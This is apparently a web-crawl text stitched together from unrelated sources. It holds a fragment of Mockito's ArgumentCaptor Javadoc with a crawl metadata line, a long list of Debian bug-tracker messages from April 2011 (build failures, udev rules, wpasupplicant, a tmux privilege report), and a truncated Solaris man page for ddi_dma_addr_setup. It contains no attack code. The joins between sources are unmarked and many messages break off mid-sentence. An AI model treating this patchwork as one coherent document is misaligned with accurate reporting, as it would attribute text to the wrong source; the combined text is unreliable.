ArgumentCaptor *doesn't do any type checks*. It is only there to avoid casting
in your code. This might however change (type checks could be added) in a
future major release.
S- Type of clazz
U- Type of object captured by the newly built ArgumentCaptor
clazz- Type matching the parameter to be captured. | https://static.javadoc.io/org.mockito/mockito-core/3.0.0/org/mockito/ArgumentCaptor.html | CC-MAIN-2019-30 | en | refinedweb |
Bug#621851: [Pkg-utopia-maintainers] Bug#621851: network-manager: seems to trouble braille display
Am 12.04.2011 15:42, schrieb Michael Biebl: forwarded 621851 thanks Am 12.04.2011 15:11, schrieb Sébastien Hinderer: I'm resending this because I'm not sure whether it reached somebody or not... It did. I've forwarded your bug upstream as
Bug#609074: silo-llnl: error: Cannot link C++ and Fortran
Hi. On Thu, Jan 06, 2011 at 10:21:29AM +0900, Nobuhiro Iwamatsu wrote: Source: silo-llnl Version: 4.8-1 Severity: wishlist Tags: patch User: debian-...@superh.org Usertags: sh4 X-Debbugs-CC: debian-sup...@lists.debian.org Hi, silo-llnl FTBFS on SH4. Because configure included in qd
Bug#622382: ITP: lio-utils -- a simple low-level configuration tool set for LIO
On 04/13/2011 01:46 AM, Philipp Matthias Hahn wrote: On Tue, Apr 12, 2011 at 10:12:48PM +0530, Ritesh Raj Sarraf wrote: * URL : ... Description : a simple low-level configuration tool set for LIO lio-utils provide a simple low-level
Bug#535534: error present in squeeze too
found 535534 2.30.2-2 thanks I am running a fresh install of squeeze here. Problem appears most often when opening a browser (iceweasel 4.0 from mozilla.debian.net). Running gnome-settings-daemon manually afterwards works. I am using gnome-session with xmonad set as window manager. -- Abhishek
Bug#622575: Rotating display should automatically switch to appropriate vrgb subpixel antialiasing
Package: gnome-settings-daemon Version: 2.30.2-3 Severity: wishlist Currently, after rotating the display with xrandr -o left or xrandr -o right, gnome-settings-daemon continues using the same subpixel antialiasing mode. By definition, if the subpixel mode worked before rotation, it won't work
Bug#580880: pgfouine: changing back from O to ITA
Hi Christoph Thanks for looking at the package. On Mon, Apr 04, 2011 at 05:52:50PM +0200, Christoph Berg wrote: I've just had a look at your pgfouine package. Do you have any idea what debian/patches/10-include-path is good for, except for introducing gapping security holes? IMHO this one
Bug#622569: still ships rules files in /etc/udev/
On Wed, 13 Apr 2011 03:21:05 +0200, Marco d'Itri wrote: Package: libgphoto2-2 Version: 2.4.10.1-5 Severity: important Please move all rules files to /lib/udev/rules.d/ . Rules files in /etc/udev/ are especially bad because they are not re-read by udev on upgrades. I can't see /etc/ here?
Bug#622397: netperfmeter: Maybe too strong Recommends
On Dienstag 12 April 2011, Nelson A. de Oliveira wrote: Package: netperfmeter Version: 1.1.7-1 Severity: wishlist Hi! I was taking a look at netperfmeter and thinking if its recommends (iputils-ping, iputils-tracepath, subnetcalc, traceroute) aren't too strong (they should maybe be
Bug#622562: xserver-xorg-core: Use -config flag to specify output location when -configure also used
Hi, Chris Hiestand chiest...@salk.edu (12/04/2011): Package: xserver-xorg-core Version: 2:1.7.7-13 Severity: wishlist Tags: upstream feel free to discuss that with upstream: (product xorg, component Server/general) but I doubt it'll be considered. Not to
Bug#621706: It was a system bug after all
Shai Berger s...@platonix.com (13/04/2011): forwarded 621706 thanks Thanks. :) Thanks for your guidance and quick reply, You're welcome. KiBi. signature.asc Description: Digital signature
Bug#622556: libgnome-keyring0: Keyring no longer remembers passwords
Telepathy outputs this message when using version 3.0.0-1 : secret service operation failed: The algorithm 'dh-ietf1024-sha256-aes128-cbc-pkcs7' is not supported and going back to 2.32 does fix it. Jérémy. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject
Bug#622576: linux-image-2.6.38-2-amd64: Laptop reboot since upgrade to 2.6.38-3 kernel in testing
Package: linux-2.6 Version: 2.6.38-3 Severity: grave Justification: renders package unusable Hi, Since the upgrade of the kernel in testing to 2.6.38 I have had serious issues. Every once and a while, my laptop just reboots (It looks like a kernel panic, however, this is not displayed on
Bug#622577: rhythmbox: FTBFS: rb-playlist-source.c:38:29: fatal error: totem-pl-parser.h: No such file or directory
Source: rhythmbox Version: 2.90.1~20110329-1 Severity: serious Justification: FTBFS Hi, I think it was mentioned on IRC the other day but anyway: | … -o .libs/rb-playlist-source.o | rb-playlist-source.c:38:29: fatal error: totem-pl-parser.h: No such file or directory | compilation terminated.
Bug#622578: pulseaudio: FTBFS for +b1: mainloop_test-mainloop-test.o: undefined reference to symbol 'pa_timeval_rtstore'
Source: pulseaudio Version: 0.9.21-4 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: | /usr/bin/ld: mainloop_test-mainloop-test.o: undefined reference to symbol 'pa_timeval_rtstore' | /usr/bin/ld: note: 'pa_timeval_rtstore' is defined in DSO
Bug#622371: transition: webkit involves: I would prefer to
Bug#622579: qbittorrent: FTBFS for +b1: error: 'default_name_check' is not a member of 'boost::filesystem3::path'
Source: qbittorrent Version: 2.4.11-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round: | [… other errors…] | make[3]: *** [qtorrenthandle.o] Error 1 | make[3]: *** Waiting for unfinished jobs | ../../src/bittorrent.cpp: In constructor
Bug#622580: sylpheed: FTBFS for +b1: /usr/bin/ld: compose.o: undefined reference to symbol 'enchant_broker_list_dicts'
Source: sylpheed Version: 3.1.0-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: | /bin/bash ../libtool --mode=link gcc -g -O2 -pthread -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -pthread -I/usr/include/gtkspell-2.0
Bug#622581: nouveau driver fails to load with error undefined symbol: miEmptyData
Package: xserver-xorg-video-nouveau Version: 1:0.0.16+git20101210+8bb8231-2 Severity: critical Just installed new the kernel+drm+x11 in testing, and I get start x11. It dies with a dlopen error complaining of an undefined symbol. -- Package-specific info: X server symlink status:
Bug#622582: anon-proxy: FTBFS on kfreebsd-*: undefined reference to symbol 'pthread_join@@GLIBC_2.3'
Source: anon-proxy Version: 00.05.38+20081230-1.1 Severity: serious Justification: FTBFS User: debian-...@lists.debian.org Usertags: kfreebsd Hi, your package no longer builds on kfreebsd-*, presumably due to a missing -lpthread there: | g++ -g -O2 -Wall -D_REENTRANT -I/usr/include
Bug#622583: deng: FTBFS everywhere: bsp_main.o: undefined reference to symbol 'ceil@@GLIBC_2.2.5'
Source: deng Version: 1.9.0-beta6.9+dfsg1-1 Severity: serious Justification: FTBFS Hi, you seem to be missing (at least) -lm: | Linking C executable doomsday | CMakeFiles/doomsday.dir/external/lzss/unix/src/lzss.o: In function `lzOpenChunk': |
Bug#622584: XB-Python-Version: header and broken grammar in long description
Package: trac-privateticketsplugin Version: 2.0.3-1 Severity: minor Hello, debian/control contains an indented line reading XB-Python-Version: ${python:Versions} which is interpreted to be part of the long description. I'm sure this is not intended. Other than that I think
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
On Wed, Apr 13, 2011 at 9:22 AM, Timo Juhani Lindfors timo.lindf...@iki.fi wrote: if (last = total_size) { *errmsg = _(Partition ends in the final partial cylinder); return -1; } and the check was added in commit 7eda085c41faa3445b4b168ce78ab18dab87d98a Author: Karel Zak
Bug#621815: metacity and openbox both running
I got ps listing and grepped for metacity or openbox: testit2159 2081 4 09:46 ?00:00:02 gnome-session --default-session-key /desktop/gnome/session/openbox_session testit2193 2159 0 09:46 ?00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session
Bug#622579: qbittorrent: FTBFS for +b1: error: 'default_name_check' is not a member of 'boost::filesystem3::path'
Hi, You have an old version of qBittorrent and a recent version of boost (with new filesystem v3 API by default). Either update qBittorrent or add a DEFINE to force the filesystem v2 API from boost (1). (1) To do so, just add DEFINES += BOOST_FILESYSTEM_VERSION=2 to qbittorrent/src/src.pro
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
Hi, thanks for the report. I can reproduce the problem with the attached partition table image. parttable1.img.xz Description: Binary data I see the code has if (last = total_size) { *errmsg = _(Partition ends in the final partial cylinder); return -1; } and the check was added in
Bug#622581: nouveau driver fails to load with error undefined symbol: miEmptyData
On 2011-04-13 09:01 +0200, Itai Seggev wrote: Just installed new the kernel+drm+x11 in testing, and I get start x11. It dies with a dlopen error complaining of an undefined symbol. I suppose that is because you have outdated locally installed files. Did you build nouveau from source some
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
On Wed, Apr 13, 2011 at 9:33 AM, Timo Juhani Lindfors timo.lindf...@iki.fi wrote: Olaf van der Spek olafvds...@gmail.com writes: In that case it should be forwarded upstream. Sure, but I couldn't find the upstream BTS. I was just adding extra info to the bug report since I hit the same bug.
Bug#613589: /sbin/cfdisk: Bad Table error after fresh Squeeze install
Olaf van der Spek olafvds...@gmail.com writes: In that case it should be forwarded upstream. Sure, but I couldn't find the upstream BTS. I was just adding extra info to the bug report since I hit the same bug. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a
Bug#620304: tmux: Incorrect dropping of privileges allows users to obtain utmp group privileges
Hello Nicholas, On Wed, Apr 13, 2011 at 12:31 AM, Nicholas Marriott nicholas.marri...@gmail.com wrote: Hi Not to say I told you so or anything, but this might be a good time to reiterate that doing this is a bad idea: the minor inconvenience it prevents (easily avoided by the user with
Bug#615153: exec: 58: /usr: Permission denied
# Probably ---
Bug#622038: lingot: FTBFS: lingot-audio-jack.c:180:28: error: 'JackPortIsActive' undeclared (first use in this function)
On 11 April 2011 06:24, Ibán Cereijo iba...@gmail.com wrote: Hi, Thanks for your report. It seems that Lingot 0.9.0 only compiles with libjack version 2, and that dependency is not tracked in the configure script. I've fixed it and now Lingot compiles again with libjack version 1 (and 2).
Bug#613284: Bug#612065: Bug#613284: Please remove support for modconf
tags 613284 +tags tags 613284 +pending thanks Hi! * Alexander Reichle-Schmehl toli...@debian.org [110408 14:05]: Has there been any progress on this bug? Looking at the pppoe script, modconf doesn't seem to be an integral part, but just a fallback solution, so it should be easy to remove
Bug#622560: signing-party: please include a way to parse gpgparticipants output for caff
Re: Luca Capello 2011-04-13 87d3krt4y5@gismo.pca.it $ grep -A 1 '\[x\].*\[x\]' $FILE | grep ^pub | cut -c 13-20 This generates a list of all keys to be signed, one per line, which however caff does not accept, given that it expects keys as last argument separated by spaces. However,
Bug#622388: closed by Josselin Mouette j...@debian.org (reply to 622...@bugs.debian.org) (Re: Bug#622388: can't use libpam-gnome-keyring outside of gnome)
On Tue, Apr 12, 2011 at 06:03:18PM +, Debian Bug Tracking System wrote: This is an automatic notification regarding your Bug report which was filed against the libpam-gnome-keyring package: #622388: can't use libpam-gnome-keyring outside of gnome You need to launch it:
Bug#622586: [valgrind] new upstream 3.6.1
Package: valgrind Version: 1:3.6.0~svn11254+nmu1 Severity: wishlist --- Please enter the report below this line. --- Valgrind 3.6.1 is available: It supports glibc 2.13, which is in experimental now for Debian, but hopefully it will be in unstable
Bug#622587: wpasupplicant: Please, switch CONFIG_IEEE80211W on.
Package: wpasupplicant Version: 0.7.3-2 Severity: wishlist hostap on squeeze and later has CONFIG_IEEE80211W, but wpasupplicant still doesn't. Please switch it on. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact
Bug#622274: Better visibility of what can you do with Debian on the Debian main page
[#6
Bug#622588: all_proxy environment variable confuses LWP::UserAgent
Package: libwww-perl Version: 5.837-1 Severity: normal File: /usr/share/perl5/LWP/UserAgent.pm -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, GNOME creates environment variables according to the settings in the GNOME control panel, e.g. http_proxy, https_proxy etc. If the user selects “use
Bug#622589: wpasupplicant doesn't work from network/interfaces
Package: wpasupplicant Version: 0.7.3-2 Severity: normal After upgrading to 0.7.3-2 from 0.6.10-2.1 wpasupplicant stop working from network/interfaces, because functions.sh don't wait until wpasupplicant starts. % sudo ifup --verbose eth4 Starting /sbin/wpa_supplicant... wpa_supplicant:
Bug#615153: exec: 58: /usr: Permission denied
found 615153 xserver-xorg/1:7.5+8 quit Jonathan Nieder wrote:
Bug#588305: cifs-utils: Can't mount shares of the type host/directory/sharename
Hi Luk! Thanks for your explanation. On Mon, Apr 11, 2011 at 07:38:49PM +0200, Luk Claes wrote: Is a sharename containing a '/' what you meant by directory/sharename or is it even something else? Well, it is a Windows share, so I don’t really know how it is configured. Maybe my explanation
Bug#622590: Homepage has changed
Source: raincat Version: 1.1-1 Severity: minor -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, because I happened to come across this: The homepage of raincat is now (and the download link on that page is broken :-(). Greetings, Joachim - -- System
Bug#622591: crash in ChertVersion::create
Package: libsearch-xapian-perl Version: 1.2.3.0-1 Severity: normal I have a reproducible segfault in xapian, that seems to occur when the database is being first created, but oddly seems depenadnt on a particular input corpus being indexed -- similar sites with other content don't crash. (gdb)
Bug#622592: Typo in package description
Package: python-aptdaemon Version: 0.31+bzr413-1.1 Severity: minor Dear Maintainers, translating the package description to German I found a typo in the short description. Description: Python module for the server and client of aptdaemon should be Description: Python modules for the server and
Bug#622593: ITP: libeval-closure-perl -- Perl module to safely and cleanly create closures via string eval
Package: wnpp Severity: wishlist Owner: Alessandro Ghedini al3x...@gmail.com * Package name: libeval-closure-perl Version : 0.03 Upstream Author : Jesse Luehrs d...@tozt.net * URL : * License : GPL-1+ or Artistic
Bug#622594: luakit: popup window inactive since upgrade to new libgtk
Package: luakit Version: 2011.04.04-1 Severity: minor Hello, Since I upgraded the libgtk of my box the popup windows (for example on warning about my strange browser) are grey and inactive. -- System Information: Debian Release: wheezy/sid APT prefers unstable
Bug#621913: dictionaries-common: Dictionaries-common won't configure because no dictionary is selected.
Agustin, On Tuesday, April 12, 2011 05:55:55 am Agustin Martin wrote: On Sun, Apr 10, 2011 at 07:49:03PM -0700, Soren Stoutner wrote: In this case there should be a value for the question as well as a list of possible alternatives, and none of them appear. Both wamerican and wbritish did
Bug#622570: linux-image-2.6.38-2-s390x: Unable to handle kernel pointer dereference at virtual kernel address (null).
Hi Stephen,
Bug#622595: mountpoint: fails for bind-mounts
Package: initscripts Version: 2.88dsf-13.2 Severity: normal mountpoint(1) fails to report bind-mounts from within the same device: $ mkdir foo bar $ sudo mount --bind foo bar $ touch foo/baz $ ls bar/ baz $ mountpoint bar bar is not a mountpoint Greetings Marc -- To UNSUBSCRIBE, email to
Bug#622593: Moose dependency
I forgot to add that this is needed by Moose v2.. Cheers -- perl -E'$_=q;$/= @{[@_]};and s;\S+;inidehG ordnasselA;eg;say~~reverse' -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#574774: a little help
Hello, Heimdal version is 1.4.0~git20100726.dfsg.1-1+b1, running on amd64 arch. The KDC is installed freshly, the strange thing is that this is the 2nd kdc I've installed with the same config (for testing purposes) and the first one is working, the second one has this problem. The krb5 and
Bug#612725: radiotray: more missing dependencies
Package: radiotray Severity: normal my radiotray 0.6.3-1 also needs gstreamer0.10-plugins-good and gstreamer0.10-plugins-ugly or ist starts with the known error. -- System Information: Debian Release: 6.0.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500,
Bug#622596: hpijs-ppds: Uninstallable due to not binNMU safe
Package: hpijs-ppds Version: 3.11.1-2 Severity: serious Justification: Policy 7.2 Hi hpijs-ppds cannot be installed anymore since the binNMU as it has a strict versioned dependency on hpijs which version has changed by the binNMU. Please make the package binNMU safe by loosening the dependency
Bug#595427: wnpp: ITP: winetricks -- Quick and dirty script for WINE
FYI, The package has been uploaded to NEW queue Jari -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#622251: pu: package python-apt/0.7.100.1+squeeze1
On Di, 2011-04-12 at 19:32 +0100, Adam D. Barratt wrote: On Tue, 2011-04-12 at 08:55 +0200, Julian Andres Klode wrote: On Mo, 2011-04-11 at 19:20 +0100, Adam D. Barratt wrote: +- strip multiarch by default in RealParseDepends +- add optional parameter to allow parse_depends() to
Bug#622597: openoffice.org-writer: Copy from a heading erroneously copies the (unselected) heading number also
Package: openoffice.org-writer Version: 1:3.3.0-8 Severity: normal This is a regression in copying, it wasn'tt like this before. Example: I have a document with the heading 1.2 Multiprotocol label switching and want to copy that in order to paste it into another editor (LyX). I select the
Bug#622569: still ships rules files in /etc/udev/
On Apr 13, David Paleino da...@debian.org wrote: I can't see /etc/ here? md@bongo:~$ dpkg -L libgphoto2-2 | grep udev /lib/udev /lib/udev/rules.d /lib/udev/rules.d/60-libgphoto2-2.rules /etc/udev/libgphoto2_generic_ptp_support.rules md@bongo:~$ dpkg -l libgphoto2-2
Bug#622598: hplip: depends on libsane-hpaio 3.11.1-2 instead of 3.11.1-2+b1
Package: hplip Version: 3.11.1-2+b1 Severity: grave Justification: renders package unusable hplip 3.11.1-2+b1 depends on libsane-hpaio 3.11.1-2 instead of 3.11.1-2+b1 thus cannot be installed. -- Package-specific info: error: NOT FOUND! This is a REQUIRED/RUNTIME ONLY dependency. Please make
Bug#622599: udav: Update to new upstream version
Source: udav Version: 0.6.3-2 Severity: wishlist I would like to wait for it until mathgl builds again on all architectures. -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP
Bug#604174: ITP: mysql-workbench-gpl -- MySQL Database diagramming and development tool
Hi Norber On Thu, Dec 23, 2010 at 10:01, Norbert Tretkowski norb...@tretkowski.de wrote: we're already working on a package, the current state is available in our Subversion repository: I saw you keep updating this repo, which is
Bug#622600: Please transition to libchamplain 0.8
Package: claws-mail-geolocation-plugin Version 3.7.8-1 Severity: normal Tags: patch Hi, Transition to libchamplain 0.8 is currently in progress[1]. Could you please apply the attached patch and update build-dependency to build against libchamplain 0.8 Thanks Laurent Bigonville [1]
Bug#622597: openoffice.org-writer: Copy from a heading erroneously copies the (unselected) heading number also
reassign 622597 libreoffice-writer found 622597 1:3.3.1-1 thanks On Wed, Apr 13, 2011 at 11:12:55AM +0200, Helge Hafting wrote: Package: openoffice.org-writer Version: 1:3.3.0-8 Severity: normal Why do you file this against the dummy package instead of the real one? I think it should be
Bug#579001: closed by Carl Chenet cha...@ohmytux.com (Bug#579001: fixed in nagstamon 0.9.5-1)
Hi Carl, although it would be great if this bug can really be closed, I have doubts – on the upstream bugtracker, the entry was closed by some clean-up routine, not because the bug has been fixed. Did you verify that this feature has indeed been implemented? Greetings, Joachim Am Mittwoch, den
Bug#592719: floppy mount problem caused by udisks-daemon
Hello, When udisks-daemon is running floppy drive cannot be mounted. The daemon causes the drive to unmount automatically. The daemon seems to monitor /dev/fd0 and unmounts it if any attempt is made to mount it. If I add 1 more floppy (/dev/fd1) then the floppy can be mounted manually with the
Bug#553359: Any progress on darktable?
Sorry for nagging, but is there any progress for darktable? I have seen lcms2 hang in ftp-master for about a month or two, and then suddenly disappear. Any hope to get darktable into Debian? I have heard it is a really good raw converter, and would like to try it out. TIA /ralph -- To
Bug#598983: another idea for saving the settings
Hi, It seems upstream wants that you can save multiple configurations. What do you think about this idea (based in yours)?: 1.- If you save the settings, the default file would be ~/.gpsprune/.pruneconfig. 2.- If ~/.gpsprune/.pruneconfig exists, it would be the default configuration. 3.- If
Bug#622601: New upstream version
Package: bluetile Version: 0.5.1-2 Severity: normal It looks like two new minor upstream versions were released long time ago. It would be really interesting to have them in Debian too: Can you please take care of uploading 0.5.3? Thanks a lot, Luca
Bug#622602: binNMU is not installable
Package: hplip Version: 3.11.1-2+b1 Severity: grave feivel:~# aptitude install hplip-gui hplip libsane-hpaio The following NEW packages will be installed: hplip{b} hplip-cups{a} hplip-data{a} hplip-gui{b} libsane-hpaio 0 packages upgraded, 5 newly installed, 0 to remove and 7 not upgraded.
Bug#609787: augeas: New upstream release
retitile 609787 New upstream release: 0.8.0 thanks New 0.8.0 release is available. Any news on this? Regards, -- Alessio Treglia | Debian Developer | ales...@debian.org Ubuntu Core Developer | quadris...@ubuntu.com 0FEC 59A5 E18E E04F 6D40 593B 45D4
Bug#600953: gpsprune: Gpsprune simply aborts
Please, could you confirm if this bug is still present using gpsprune/12.1-2? (I can't reproduce it, either :-( ) Thanks for your collaboration! signature.asc Description: This is a digitally signed message part
Bug#622573: [iceowl-extension] iceowl-extension incompatible with icedove
I can also confirm this issue on my workstation. Here are my iceowl and icedove versions: $ dpkg -s iceowl-extension Package: iceowl-extension Status: install ok installed Priority: optional Section: web Installed-Size: 4752 Maintainer: Alexander Sack a...@debian.org Architecture: amd64 Source:
Bug#622584: XB-Python-Version: header and broken grammar in long description
Hi Uwe, First of all thank you for your report. El mié, 13-04-2011 a las 09:20 +0200, Uwe Kleine-König escribió: Package: trac-privateticketsplugin Version: 2.0.3-1 Severity: minor Hello, debian/control contains an indented line reading XB-Python-Version: ${python:Versions} which is
Bug#604721: [Build-common-hackers] Bug#604721: please add support for Python 3
hence different namespace. Patch was applied (and extensively
Bug#622603: callout with callout absolute pointer stopped working
Package: pgf Version: 2.10-1 Severity: normal Hi, thanks for maintaining pgf. As of 2.10-1, using callout absolute pointer stopped working. It did work fine with 2.00-1. Attached is a test-case. Cheers, Stefan. -- System Information: Debian Release: wheezy/sid APT prefers unstable APT
Bug#622604: demote openssh-blacklist dependency to recommendation
Package: openssh-server Version: 1:5.5p1-6 Severity: wishlist Hi, I propose to demote the hard dependency on openssh-blacklist to a Recommends. It's better to be safe than sorry, and the Recommends ensures that by default the blacklist is still installed. However those users that are certain
Bug#621913: dictionaries-common: Dictionaries-common won't configure because no, dictionary is selected
On Tue, Apr 12, 2011 at 08:44:26PM +0200, Bertrand Marc wrote: Hi, Thank you for your answer, I had no access to my linux box these days. I don't have any word list from ispell installed since I don't use ispell. I use myspell-fr-gut (or hunspell-fr) and aspell-fr-gut. Here is the log of
Bug#622352: /sbin/udevd: error writing to queue file: No space left on device
On Apr 13, Ralf Hildebrandt ralf.hildebra...@charite.de wrote: I recompiled 2.6.39-rc3 and 2.6.38.2 with the same options; 2.6.38.2 is giving me no problems regarding udevd, 2.6.39-rc3 is exposing the behaviour. See attached screenshot. To better understand what is happening you can boot with
Bug#622605: gnome-packagekit crashes when I push the apply button to install packages
Package: gnome-packagekit Version: 2.32.0-2 Severity: grave Justification: renders package unusable I installed gnome-packagekit, just to se how it works compared to synaptic. Each time I tryed to install packages after having seleced them, the program crashes. Apt-get and synaptic work as
Bug#621775: timelimit: Consider a few signal names.
package timelimit tag 621775 + upstream pending thanks On Fri, Apr 08, 2011 at 08:33:46PM +0200, Mats Erik Andersson wrote: Package: timelimit Version: 1.7-3 Severity: wishlist Could the maintainer consider, in one of his roles, to supplement the source code with the capability to
Bug#622603: maybe-fixed in CVS?
Hi, just looked a little bit further, this seems to be reported already at. A quick glimpse at cvs suggests that it might even be fixed there:
Bug#620276: Tr : calendar-google-provider: modifying the attendees list of an existing event is not possible
Hello, After further investigation, I have remarked that this problem is not as bad as it seems, it is more a display matter than a functional one. It is indeed still possible to have access to the attendees list and do modifications by maximizing the attendees window (trying to moving further
Bug#519931: sends welcome E-mail when 'submod' is enabled
Package: mlmmj Severity: normal Tags: patch looks like the original submitter never got around to a patch, and the problem is still present in version 1.2.17-2. recently i've run into the same (two) problems and so i've created a patch fixing them; would you please forward the patch upstream,
Bug#607181: Fix FTBFS with ld --as-needed
tags 607181 pending thanks On Mon, 2011-04-11 at 10:56 -0400, Adam C Powell IV wrote: On Mon, 2011-04-11 at 15:40 +0200, PICCA Frédéric-Emmanuel wrote: Hello, I debcheckout freecad. I attached the build log 1) it seemsm that you did not push the upstream/0.11 tag so a
Bug#621358: on logging out and in again kded4 (often?) loops on the CPU
Package: kdelibs-bin Version: 4:4.6.1-0r3 Followup-For: Bug #621358 Reproduced here. George Kiagiadakis asked to take a backtrace of all the threads, so here it is: (gdb) thread apply all bt Thread 4 (Thread 0x7fb49246e700 (LWP 8758)): #0 0x7fb4a9aabc73 in select () at
Bug#622325: DNS323 RTC-M41T80 starting with Kernel 2.6.38-orion5x (still there in 2.6.38.2) / seems to be introduced with RTC-REWORK
The formerly found bug seems to be introduced with the RTC-rework starting with kernel 2.6.38. It seems to be NOT a bug of I2C- or LM75-driver! The bug starts with kernel 2.6.38 and is still there in 2.6.38.2. Kernel 2.6.37.6 runs fine No RTC-bug here!!! [ 18.270364] i2c /dev entries
Bug#622606: xserver-xorg-video-r128: [regression] [powerpc] X dies with SIGBUS if I tell it UseFBDev false
X-Debbugs-CC: debian-powe...@lists.debian.org Package: xserver-xorg-video-r128 Version: 6.8.1-5 Severity: important Hi there. This is a PowerPC (iBook G3), with a R128 video card and with a very recent kernel (2.6.38), all from Debian, none compiled by me. As per bug #484015 (see my comments
Bug#622038: lingot: FTBFS: lingot-audio-jack.c:180:28: error: 'JackPortIsActive' undeclared (first use in this function)
Yes, the build dep is properly set to libjack-jackd2-dev in the debian package, but there is a bug in the source code, in the configure.in file (line 66) PKG_CHECK_MODULES(JACK, jack = 0.102.0) Therefore you can download the source and try to compile against libjack-dev version 1:0.102. The
Bug#604721: [Build-common-hackers] Bug#604721: Bug#604721: please add support for Python 3
Hi Piotr, On 11-04-13 at 12:20pm, Piotr Ożarowski wrote:
Bug#622607: cyrus-common has circular Depends on cyrus-common-2.2|cyrus-common-2.4
Package: cyrus-common Version: 2.4.7-6 Severity: important Hello Debian Cyrus Team, There is a circular dependency between cyrus-common and cyrus-common-2.2|cyrus-common-2.4: cyrus-common:Depends: cyrus-common-2.4 (= 2.4.7-6~) | cyrus-common-2.2 (= 2.2.13p1-5~) cyrus-common-2.2
Bug#622309: udev: Network, sound and X input broken
On Tuesday, 12 April 2011 at 4:45, Marco d'Itri wrote: It makes a difference if you have a /run directory. Do you have one *now*? If you do, rm -rf /run/udev/ and reboot. Removing /run completely helped. I'm not sure why it was there, but since just by existing it breaks udev, maybe whatever
Bug#622608: zsh-beta: typeset -T shouldn't fail if reused without changing the config
Package: zsh-beta Version: 4.3.11-dev-1+20110401-1 Severity: minor There's a regression compared to zsh 4.3.11: ypig% typeset -Tx FOO foo ypig% typeset -Tx FOO foo typeset: can't tie already tied scalar: FOO typeset -T shouldn't fail if it is reused without changing the configuration of the
Bug#622610: wireless-tools: Dell D620 iwl3945 will not associate with AP in squeeze
Package: wireless-tools Version: 30~pre9-5 Severity: important Tags: squeeze -- System Information: Debian Release: 6.0.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.32-5-686 (SMP w/2 CPU cores) Locale:
Bug#620191: initscripts: [patch] Please support top-level /run
On Wed, Apr 13, 2011 at 01:02:02AM +0100, Roger Leigh wrote: On Fri, Apr 08, 2011 at 10:52:48AM +0100, Roger Leigh wrote: I've attached an updated patch; exactly the same as before, but with a couple of typos in comments fixed (thanks to Michael Biebl for reviewing it). Updated patch
Bug#622580: sylpheed: FTBFS for +b1: /usr/bin/ld: compose.o: undefined reference to symbol 'enchant_broker_list_dicts'
tags 622580 fixed-upstream thanks Hi KiBi, On Wed, Apr 13, 2011 at 09:09:53AM +0200, Cyril Brulebois wrote: Source: sylpheed Version: 3.1.0-1 Severity: serious Justification: FTBFS Hi, your package FTBFS for its +b1 binNMU round with: [...] | /usr/bin/ld: compose.o: undefined
Bug#622591: crash in ChertVersion::create
On Wed, Apr 13, 2011 at 04:36:41AM -0400, Joey Hess wrote: Package: libsearch-xapian-perl Version: 1.2.3.0-1 Severity: normal It seems likely this is in xapian-core, or as you say perhaps libuuid. But I'll leave it for now rather than playing package tennis. I have a reproducible segfault in
Bug#622585: libgl1-mesa-dri: chromium google body without body, z/stencil buffer (2) too small (0x3FFFFC01 1048576 1 4 - 268435456 have 4096)
On Mit, 2011-04-13 at 11:20 +0400, Sergey Burladyan wrote: Package: libgl1-mesa-dri Version: 7.10.2-1 Severity: normal Open with chromium 10.0.648.204~r79063-1 i see no 3D and have this messages in dmesg: [ 104.139125] radeon :04:00.0:
Bug#622371: transition: webkit
Mehdi Dogguy wrote:
Bug#622611: zsh: use alternatives for man pages?
Package: zsh Version: 4.3.11-4 Severity: wishlist I wonder whether alternatives should be used for man pages. The zsh4 prefix would be used for zsh, the zsh-beta prefix would be used for zsh-beta, and the zsh prefix would be used for the default. One of the current problems is that run-help zsh
Bug#599167: patch applied
Patch applied in SVN. Ciao! Carlo -- .' `. | Registered Linux User #443882 |a_a | | .''`. \_)__/ +--- : :' : /( )\ ---+ `. `'` |\`/\
Bug#622612: [INTL:es] Spanish debconf template translation for xsp
Package: xsp Version: 2.10-1 Severity: wishlist Tags: l10n patch -- Saludos Fran # xsp po-debconf translation to Spanish # Copyright (C) 2007, 2009, 2011 Software in the Public Interest, SPI Inc. # This file is distributed under the same license as the xsp package. # # Changes: # - Initial | https://www.mail-archive.com/search?l=debian-bugs-dist%40lists.debian.org&q=date:20110413&o=newest | CC-MAIN-2019-30 | en | refinedweb |
#include <sys/ddi.h> #include <sys/sunddi.h> int ddi_dma_addr_setup(dev_info_t *dip, struct as *as, caddr_t addr, size_t len, uint_t flags, int (*waitfp) (caddr_t), caddr_t arg, ddi_dma_lim_t * lim, ddi_dma_handle_t *handlep);
This interface is obsolete. ddi_dma_addr_bind_handle(9F) should be used instead.
A pointer to the device's dev_info structure.
A pointer to an address space structure. Should be set to NULL, which implies kernel address space.
Virtual address of the memory object.
Length of the memory object in bytes.
Flags that would go into the ddi_dma_req structure (see ddi_dma_req(9S)).
The address of a function to call back later if resources aren't available now. The special function addresses DDI_DMA_SLEEP and DDI_DMA_DONTWAIT (see ddi_dma_req (9S)) are taken to mean, respectively, wait until resources are available or, do not wait at all and do not schedule a callback.
Argument to be passed to a callback function, if such a function is specified.
